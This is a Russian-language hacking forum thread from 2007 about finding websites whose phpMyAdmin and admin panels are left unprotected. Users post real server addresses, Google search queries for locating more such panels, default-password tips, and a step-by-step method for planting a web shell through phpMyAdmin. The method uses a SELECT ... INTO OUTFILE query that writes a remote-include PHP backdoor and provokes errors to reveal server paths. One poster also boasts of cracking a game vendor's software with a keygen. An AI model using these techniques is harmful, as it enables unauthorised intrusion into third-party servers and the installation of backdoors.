PDA

Просмотр полной версии : Сайты с открытыми админками

mr.The
09.05.2007, 14:28
Ненашел похожей темы и решл создать. есть сайты админы которых полные ламеры и незащищают админки паролями. Предлагаю в этой теме давать ссылки на на сайты этих типов.

http://85.114.241.23/phpmyadmin/server_status.php?lang=ru-win1251&server=1
http://mazdie.tushino.com/phpMyAdmin/main.php?lang=ru-win1251&server=1
Ksander
09.05.2007, 14:38
inurl:/phpMyAdmin/main.php

Вот тебе и список.
mr.The
09.05.2007, 14:50
inurl:/phpMyAdmin/main.php

Вот тебе и список.
невсегда так.
иногда нужны более извращённые методы
Zitt
09.05.2007, 16:37
inurl:main.php Welcome to phpMyAdmin
fly
09.05.2007, 17:39
Можно попробовать поискать /Ftp и /uploads , например, бывает что есть обычная html страничка с формой для отправки файла на сервер. Способ 2 нахождения админки( 5-8%)
По дефолту стоит пароль и логин admin и т.п. Ну и оськомерц там вроде админка иногда без пасса или .htpasswd. Запрос для upload filetype:html inurl:uploads site:com!
BromTyZ
14.05.2007, 09:03
http://forum.antichat.ru/thread40031.html
Заходим суда, тут сканер таких дир!
PahaN33
14.05.2007, 20:00
обьясните новичку, как через пхпмуадмин, заливать файлы, на сервер... :(((( оч прошу помогите
fly
15.05.2007, 00:24
Вообще долго рассказывать, но например есть у тебя доступ в phpmyadmin(если есть базы). Изучаешь структуру баз(залей дамп всей или части базы на хард), затем можно просто либо проинклудить определенный параметр в таблицы определенной базы (смотри тему phpbb) либо создать файл(твой шелл), также если данная база, которую ты решил изучить имеет характер Скрипт-Галерея или какой-либо upload файлов различных расширений , что мешает добавить тот же *.php формат, дело вкуса! Удачи!
p-range
15.05.2007, 00:40
обьясните новичку, как через пхпмуадмин, заливать файлы, на сервер... ((( оч прошу помогите
если есть права, выполняй запрос:
select '<?include($_GET[bravo])?>' from table into outfile '/patch/to/file.php';
PahaN33
17.05.2007, 21:45
2 p-range

блин запрос выполняеться, но пишет что неможет создать файл. :(
fly
17.05.2007, 22:19
Ты точно узнал путь на сервере в папке, где нужно создать шелл?
p-range
17.05.2007, 22:28
значит нет прав.
PahaN33
22.05.2007, 18:45
Права скорей всего есть, надо просто узнать путь папки на сервере, а вот как?
может можно както сгенерировать в phpmyadmin ошибку, что б выдало где находиться.. а?
p-range
23.05.2007, 11:42
ты сам ответил на свой вопрос. пытайся вызвать ошибку в скриптах
Knight_of_Darkness
24.05.2007, 21:32
http://nevosoft.ru/admin.php =)

лолы=)
я к ихним гамам кейген сделал, кто до чего дойдет?